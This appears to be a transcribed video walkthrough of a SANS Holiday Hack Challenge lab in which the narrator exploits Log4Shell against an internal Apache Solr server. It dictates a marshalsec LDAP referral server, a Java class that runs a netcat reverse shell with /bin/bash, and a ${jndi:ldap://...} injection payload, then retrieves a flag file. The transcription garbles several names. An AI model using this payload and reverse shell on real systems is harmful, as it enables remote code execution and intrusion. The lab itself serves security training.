Right, this is OXDF looking at the bonus red Log4Jack terminal in the Sans Holiday Hack Challenge from 2021. And they give us this terminal, and as well as we have a GitHub gist here from Josh Wright that basically walks through the different tools you have here and the steps you can use. So we're basically going to follow these steps. It's not meant to be a challenge to be solved as much as it is kind of just to be walked through an example of how to exploit Log4j to get remote code execution. So with that, we'll take a dive in. The first thing we're going to notice here is that we do have one thing I mistakenly thought at first is I was trying to get to solarpower.kringlecastle.com from the outside. It is just an internal thing, so you can basically only get to it from this from inside this terminal. If you think about it, that actually makes a lot of sense because otherwise it would be getting owned 7 ways from Sunday out on the internet. But I can hit it in here. If I try to curl it and nothing comes back, if I do a -v, I'll see it's just returning a redirect to /solar. If I do the hit /solar, I get data. So clearly there's an instance of Apache Solar running here. So what I'm going to do is first, I'm going to start in here. They've given me a few tools. There's help.md, which is the same gist that I'm looking at over here. There's this main term.sh, which is what fires all this up, and there's a Marshall sec directory. This is a specific set of tools for exploiting this vulnerability. It's available on GitHub. We can go out and hit it. And then there's a web directory, which is what's being hosted up here in the top in what looks like a Python web server. So we're going to go into the Marshall sec directory. And now if we run ls, we've got the Marshall sec jar here, which is the tool we're going to use. So if we do java -cp Marshall sec jar, Marshall sec, oops, let's see, Marshall sec .jndi. This would be the class we're going to run. The LDAP ref server. And this is the HTTP. We need our web server address, which is up here, 172.17.0.2. :/:8080, because that's the port we're going to hit. Slash, and we can put the exploit name, the code we're going to try to exploit. So that's going to, we're going to call it ulog exploit, like that. And this is going to run, and it's going to start a server listening on 1389, which is an alternative LDAP port that we're going to use here. So this is going to be our LDAP server, and this is one of those things where you can't just there's not like a simple LDAP server out there, so you got to use these more complicated ones. I recently showed a hack the box machine like this where we use the JNDI toolkit, exploit toolkit that does the same thing, provides an LDAP server. This will work too. Let's go with that. So now we're listening. We're going to come down into the web one here. We're going to go into, or down into this other one here, and we're going to go into the web. And here we're going to go ahead and create our exploit. And so we will vim ulog exploit.java. And it's going to be a very simple exploit. So it's going to be public class ulog exploit static try. The thing about Java, it's got so much, I don't know what you call this, structure you have to put around it. java.lang.runtime.getRuntime.exe exec, and then we will put in here netcat, the IP we're trying to get to, so that's 172.17.0.2, 4444, because that's the port we're listening to up here, -e bin bash. So all of this is just to do a basic reverse shell, and then we're going to do catch exception error and error dot print stack of 1c trace, like that. Close that one. Close that one, close that one. So basically, this whole thing, all we've done here is write a simple class that is going to run a single thing, which is going to be execing a reverse shell using netcat. So we've done that. Now we just need to compile that, just like we did in the blue team video. See that? We use Java C. And we should have a class file here. So we do. We have our ulogexploit.class. Now we've basically got everything we need here to make this happen. Let's go ahead and set this up. So we're going to do HTTP solarpower.pringlecastle.com/8983/solar/ and I'm not exactly sure where they get this path from. I suspect there's a lot of ways we could pass it in, but you know, we're going to use the one they use in the example because we know it'll work. Foo equals $ escape here JNDI, and then we need the IP that MarshallSec is listening on, and that is going to be 172.17.0.2, 1389. And then we need to just give it /Yule log exploit. To close that out and like that. Now, when we run this, if it works, we're going to hit the Solar server and it's going to log. I suspect I've already got a typo in here. Let's see. It's not cores equals, it's cores ? Like that. When it logs the fact this query came in, maybe because it's a bad parameter, or maybe just logs all queries, this JNDI query is going to get triggered, which is going to reach out to our LDAP server here to request ulog exploit. This is going to be basically doing a redirect to say, go get that from the Python web server or whatever web server this is, and the web server is going to be hosting. Somehow it's going to know that, you know, hash ulog exploit means get ulog exploit.class. That must be something in the web server. It's not obvious to me. We could look into it, but it'll return that class to here, which will return it to them, which will then run it and presumably give me a reverse shell. So let's see if it works. Did not. Let's see. Response. Header. That looks good. We didn't get a connection though. See. Let's work through this bit by bit. Okay, so we're hitting the right endpoint, and JNDI 172.16.17.2. I guess we could check up here. ifconfig. That is 117. Okay, so that is right. We're going on 172.17.02, 1389, which is what we're listening on, ulog exploit. It didn't get a request though. Let's look at the request. I'm gonna try. I wonder if there's a typo I've made in there somewhere. I'm gonna try coming in here and can I paste another thing? And we will need to change the IP. 172.17.0.2. Ooh, and it worked that time. I wonder what the difference was. Oh, I see. I didn't request LDAP the last time. So it comes down here, it gets the thing, exploit, it comes up here, and then I get a connection. I can run ID to see I'm running as the Solar user. Is there a file I'm supposed to get here to complete this? I don't remember for actually. Let's see. Where are we? Home. CD, let's see, ls, cd, ls, solar, there's a kringle.txt, cd solar, cat, kringle.txt. The solution to log4shell is patching, sincerely Santa. So is it, it says there's a run to answer. We should run down here. Let's come down here. I'm so used to using tmux with my hands and not with their mouse. Run to answer. What's Santa's solution for log4j? Patching. And it looks like we've completed the terminal. We can come up here. I wonder what was in the troll directory. What directory am I in? Home solar. Troll. Can I get in there? I can. Ah, okay, that must be where everything is running out of. They don't give me much of a window to work out of here, so probably stop our enumeration there. But again, this is just like the blue team one. This is a really cool little walkthrough of showing how to exploit it. There are different tools out here to do that. You don't have to use the Marshall Sec jar. You know, there's, like I said, there's other toolkits. The other thing I've shown in one of my other posts is you don't actually have to create a full Java class. You can use YSO-serial to create a serialized Java object, and it will work just as well. So there's lots of ways to play with this, but this is a great introduction to the problem and a hands-on way to exploit it. So again, thanks for CounterHack for coming in at the last minute and adding this to the challenge this year. It's certainly a great addition. Thank you for sticking around to the end, and I will talk to you next time.